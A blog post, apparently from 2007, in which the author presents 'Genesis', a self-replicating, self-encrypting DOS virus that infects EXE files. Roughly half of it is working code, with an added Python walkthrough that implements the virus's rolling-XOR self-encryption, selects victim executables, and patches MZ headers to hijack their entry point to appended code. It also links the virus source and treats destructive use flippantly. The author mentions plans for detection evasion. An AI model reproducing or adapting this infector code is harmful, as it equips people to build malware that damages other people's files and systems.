My First Computer Virus

Monday, February 05, 2007

After two weeks of exhausting yet “exciting” hard work it’s finally here! Ladies and gentlemen, I am glad to introduce to you “Genesis”: my first malicious, self-replicating, self-encrypting piece of code, or in simpler terms … my first computer virus! :D

The story began on a cold Friday evening a couple of weeks ago. By then the semester was already over and I was about to start studying for my upcoming final exams. My friend Jareer had an assembly exam and asked me to help him try out a few assembly programs in the days before it.

We gathered at Basel’s house, set up a laptop and an assembler and immediately began writing and assembling short snippets of code. One of the things I always like to do when I help a friend with a computer-related course is to build and show him, on the spot, a practical and interesting application of the thing he’s studying, as an attempt to raise his spirits before getting into the boring technicalities.

The curriculum of the assembly course he had taken covered the DOS file-access interrupts (the INT 21h file services): how low-level assembly code deals with files and the file system in general. It was an interesting subject for me to read about, especially since I had no knowledge of this specific topic and had wondered about it a couple of times before!

Anyway, the notes he had were straightforward and provided enough information for me to write a short program that dumps itself from memory into an executable COM file; that is, it creates a simple executable containing its own code.

I showed the program to Zaid, who was there at the time, and he laughed a bit. “Not like it can dump itself into an EXE!” he said, which was a fair point about why this was a lame attempt. For those of you who don’t know: COM files are the simplest kind of executable there is; they contain pure machine code from the first byte to the last, with no header at all (DOS loads the whole file at offset 100h of a fresh 64 KB segment and jumps to it). EXE files, by contrast, support multi-segment code and carry a header of tables and values instructing the OS how to load and execute their code. Their structure is involved enough that you certainly need to do a little research before deciding to mess with an EXE file in a hex editor!

Zaid’s comment on copying into EXE files made me think … “why not? :P” …

The following day was the start of two weeks of hard work. I was a bit uncomfortable during this period because the exams were under way and I couldn’t resist working on this thing. I worked whole nights before exams and managed to study a little bit, although I wasn’t into it, not at all.

Anyway, here’s a glimpse of what I came up with! Some basic information that you need to know before you continue reading …

Shown above is the structure of a simple DOS executable that has no Windows header (left), and next to it (right) a diagram of the same executable once loaded in memory. The file starts with what is called the “DOS header” (the MZ header, named after its two-byte signature), a bunch of values the operating system needs in order to load the executable. The header includes: the size of the file in 512-byte pages, the number of bytes used in the last page, the size of the header itself in 16-byte paragraphs, a pointer to a Windows header (if any exists; it lives at offset 3Ch), the extra memory the program wants beyond its image, the initial SS:SP for the stack, a checksum word (which DOS does not actually verify), and the initial CS:IP, that is, the program’s entry point. The segment values in the header are relative to wherever DOS places the load module (everything after the header), so the entry point’s position in the file is header size + CS × 16 + IP.

So what I was trying to make was a piece of code that appends itself to an executable file and modifies the executable’s entry point so that execution starts with the appended code. When it is done, this code jumps to the original entry point to pass execution to the host program. The “injection” must be accompanied by the appropriate modifications to the file header (the size fields, the entry point and the memory request) to ensure that the file remains a valid DOS executable and behaves as expected.

After some reading I was able to manually inject one executable into another with a hex editor. Soon after, I wrote a code snippet to do the same, and with a bit more work I came up with Genesis. Here’s how it works …

Genesis checks all files with an EXE extension in its current directory and analyses each one to find suitable victims. Target executables must be valid 16-bit DOS executables smaller than 64 KB. Once a victim is located, it is infected. The infection process creates an encrypted copy of the virus code with a decryption module in front of it. Genesis encrypts itself by XORing its own machine code with a series of incrementing bytes starting at a random value, the key. This key is saved in the decryption module so that the generated copy can decrypt itself and run later. The encrypted copy is built in the host program’s stack segment, which the virus uses as its working area. The following diagram illustrates the structure of an infected executable and the corresponding process once loaded in memory …
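The encryption step, as an added example in Python that is not the post’s code: the running-key XOR (key, key+1, key+2, … mod 256) the post describes, which serves for both directions, plus the analyst’s inverse, recovering the key byte from a few bytes of known plaintext. The function names are mine, and the 8086 decryptor sketched in the docstring illustrates the idea; it is not the post’s decryption module.

```python
import random
from typing import Optional, Tuple


def xor_rolling(data: bytes, key: int) -> bytes:
    """XOR byte i of data with (key + i) mod 256.

    One routine serves both directions: applying it twice with the same key
    byte restores the original. On the 8086 the decryptor is only a handful of
    instructions (an illustrative sketch, not the post's decryption module):

        mov  si, offset body    ; first byte of the encrypted body
        mov  cx, BODY_LEN       ; number of bytes to process
        mov  al, KEY            ; key byte, patched in at infection time
    next:
        xor  [si], al           ; decrypt one byte in place
        inc  si
        inc  al                 ; key advances by one per byte
        loop next
    """
    out = bytearray(len(data))
    k = key & 0xFF
    for i, b in enumerate(data):
        out[i] = b ^ k
        k = (k + 1) & 0xFF
    return bytes(out)


def make_encrypted_copy(body: bytes, key: Optional[int] = None) -> Tuple[int, bytes]:
    """Pick a fresh key byte (or use the one given) and return (key, ciphertext).
    The key has to travel with the copy, inside the decryptor, or the copy can
    never run; that is exactly what gives an analyst the way back in."""
    if key is None:
        key = random.randrange(256)
    return key, xor_rolling(body, key)


def recover_key(known: bytes, ciphertext: bytes, at: int = 0) -> int:
    """Known plaintext at offset `at` gives the key: byte at+j was XORed with
    (key + at + j) mod 256, so key = (p[j] ^ c[at+j]) - at - j. Every known
    byte must agree, otherwise the guess about the plaintext was wrong."""
    if not known or at + len(known) > len(ciphertext):
        raise ValueError("known plaintext must lie inside the ciphertext")
    candidates = {((known[j] ^ ciphertext[at + j]) - at - j) & 0xFF
                  for j in range(len(known))}
    if len(candidates) != 1:
        raise ValueError("known plaintext does not fit a single rolling key")
    return candidates.pop()
```

Because the key changes with every infection, a byte pattern taken from the plaintext body does not match the encrypted copy. The decryptor loop and the key byte, however, sit in the clear and keep the same shape in every copy, so a static scanner can still match on them. And since a rolling XOR carries only one byte of secret, any plaintext you can guess (the first opcode of the body, say) hands over the key at once, as `recover_key` shows.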

The victim’s entry point is changed to point at the decryption module. The amount of memory the victim requests for its stack segment is increased so that the virus can use the stack segment to copy itself later.
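The header bookkeeping described above (the MZ fields from the overview, the victim criteria, and the size, entry-point and memory-request changes an appended copy needs), as an added example in Python that is not the post’s code: it decodes the old-style MZ header, applies the victim checks, and patches a constructed 48-byte sample so that execution starts at an appended payload. The payload is a placeholder byte string rather than a decryptor, the sample images are constructed here, and the `extra_paragraphs` parameter and function names are assumptions for illustration.

```python
import struct
from typing import Tuple

# Old-style 28-byte MZ header, little-endian. Names follow the conventional
# e_* names; segment-valued fields are relative to the start of the load module
# (everything after the header) once DOS has placed it in memory.
MZ_FIELDS = ("e_magic", "e_cblp", "e_cp", "e_crlc", "e_cparhdr", "e_minalloc",
             "e_maxalloc", "e_ss", "e_sp", "e_csum", "e_ip", "e_cs",
             "e_lfarlc", "e_ovno")
MZ = struct.Struct("<2sHHHHHHHHHHHHH")
PAGE = 512   # e_cp counts 512-byte pages; e_cblp is the bytes used in the last one
PARA = 16    # e_cparhdr, e_cs, e_ss and e_minalloc count 16-byte paragraphs


def parse_mz(image: bytes) -> dict:
    """Decode the header and derive the sizes and offsets the loader uses."""
    if len(image) < MZ.size:
        raise ValueError("too short for an MZ header")
    h = dict(zip(MZ_FIELDS, MZ.unpack_from(image)))
    if h["e_magic"] not in (b"MZ", b"ZM"):
        raise ValueError("not an MZ executable")
    h["header_size"] = h["e_cparhdr"] * PARA
    # e_cblp == 0 means the last page is completely used.
    h["file_size"] = ((h["e_cp"] - 1) * PAGE + h["e_cblp"]) if h["e_cblp"] else h["e_cp"] * PAGE
    h["entry_file_offset"] = h["header_size"] + h["e_cs"] * PARA + h["e_ip"]
    # The pointer to a Windows (NE/PE) header lives at 3Ch and only exists when
    # the relocation table starts at 40h or later.
    h["e_lfanew"] = 0
    if h["e_lfarlc"] >= 0x40 and len(image) >= 0x40:
        h["e_lfanew"] = struct.unpack_from("<I", image, 0x3C)[0]
    return h


def is_suitable_victim(image: bytes, limit: int = 64 * 1024) -> Tuple[bool, str]:
    """The post's criteria: a valid DOS EXE, no Windows header, under 64 KB."""
    try:
        h = parse_mz(image)
    except ValueError as err:
        return False, str(err)
    if h["e_lfanew"]:
        return False, "has a Windows (NE/PE) header"
    if h["file_size"] != len(image):
        return False, "declared size does not match the file (overlay or truncation)"
    if len(image) >= limit:
        return False, "64 KB or larger"
    if h["entry_file_offset"] >= len(image):
        return False, "entry point lies outside the file"
    return True, "ok"


def append_and_repoint(image: bytes, payload: bytes, extra_paragraphs: int) -> Tuple[bytes, dict]:
    """Append payload to the load module, point CS:IP at it, grow the memory
    request, and fix the page counts. The original CS:IP is returned so the
    appended code can jump back to the host. e_csum is left alone: DOS does
    not verify it. Relocation entries are untouched because nothing moves."""
    ok, why = is_suitable_victim(image)
    if not ok:
        raise ValueError(why)
    h = parse_mz(image)
    load_off = len(image) - h["header_size"]      # payload offset inside the load module
    new_cs, new_ip = divmod(load_off, PARA)
    total = len(image) + len(payload)
    e_cp, e_cblp = -(-total // PAGE), total % PAGE   # ceil pages, bytes in last page
    fields = {k: h[k] for k in MZ_FIELDS}
    fields.update(e_cp=e_cp, e_cblp=e_cblp, e_cs=new_cs, e_ip=new_ip,
                  e_minalloc=min(h["e_minalloc"] + extra_paragraphs, 0xFFFF))
    new_header = MZ.pack(*(fields[k] for k in MZ_FIELDS))
    new_image = new_header + image[MZ.size:] + payload
    info = {"orig_entry": (h["e_cs"], h["e_ip"]), "new_entry": (new_cs, new_ip),
            "payload_file_offset": len(image)}
    return new_image, info


def build_sample(windows_header: bool = False) -> bytes:
    """Constructed test images, not programs from the post. The plain one is a
    48-byte DOS EXE: a 32-byte header, then 16 bytes of code that only
    terminates ("mov ah,4Ch / int 21h", NOP-padded). The other one carries an
    e_lfanew pointing at a fake PE signature and must be rejected."""
    if not windows_header:
        code = b"\xB4\x4C\xCD\x21" + b"\x90" * 12
        hdr = MZ.pack(b"MZ", 48, 1, 0, 2, 0x10, 0xFFFF, 1, 0x100, 0, 0, 0, 0x1C, 0)
        return hdr + b"\0" * 4 + code
    hdr = MZ.pack(b"MZ", 80, 1, 0, 4, 0x10, 0xFFFF, 1, 0x100, 0, 0, 0, 0x40, 0)
    return hdr + b"\0" * (0x3C - MZ.size) + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 12
```

Run `append_and_repoint(build_sample(), payload, 0x40)` and compare `parse_mz` of the two images: the page count and last-page byte count grow with the payload, CS:IP moves from 0:0 to 1:0 (the payload lands 16 bytes into the load module), and the memory request grows by the extra paragraphs. A file that is shorter or longer than its header claims is refused on purpose; appending to a file with an overlay would put the new code where the loader never maps it.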

Although Genesis is a 16-bit virus that runs inside a virtual DOS machine rather than natively on 32-bit Pentium machines running Windows, it is definitely a computer virus! Both McAfee Enterprise and Symantec AntiVirus recognize its viral activity, although their responses differ. McAfee blocks Genesis whenever it tries to infect other programs and identifies it as Univ/r. Symantec, on the other hand, recognizes the virus code before execution and identifies it as Bloodhound.DirActEXE. Both names are generic heuristic detections rather than a signature written for Genesis specifically. The viral activity is pretty obvious because this virus modifies the entry points of other executables, which is suspicious enough I guess :P

You can download the Genesis assembly source code (2 KB) here. You may also need a bunch of handy 16-bit applications (1 KB) for your infection purposes, plus Microsoft Macro Assembler 5.13 & CodeView 3.14 (388 KB) to assemble the virus and observe its activity.

The virus source code linked above is safe to download. Assembling it generates a special, already-infected program; it does NOT assemble into Genesis on its own. This is simply because Genesis is not a standalone program; it is a piece of code. The differences between this program and other infected ones are that it passes execution to the virus code by itself (its entry point is not hijacked) and that it contains the bare, unencrypted virus code.

This virus does nothing except replicate. It also displays a notification whenever it is executed and shows a brief summary of its file-scan status.

Genesis is just the start; I’ve already started researching the possibility of developing a 32-bit version of the virus targeting Windows executables. The good thing is that the virus code is less than 2 KB in size, which leaves plenty of room for further tricks and functionality. I also became acquainted with some means of evading detection, but I’ll save those for my future plans. Putting any more work into an open-source virus would be a waste of my time.

Please note that this virus was made for educational and entertainment purposes only, and as a proof of concept that viruses can be engineered on 16-bit platforms and run on 32-bit ones. Whether or not you decide to screw yourself and your 16-bit applications by running this virus is totally up to you. Genesis should NOT be used for destructive purposes (yeah right :P). No, seriously, this is dangerous and should not be run without taking the necessary precautions. Have fun ;)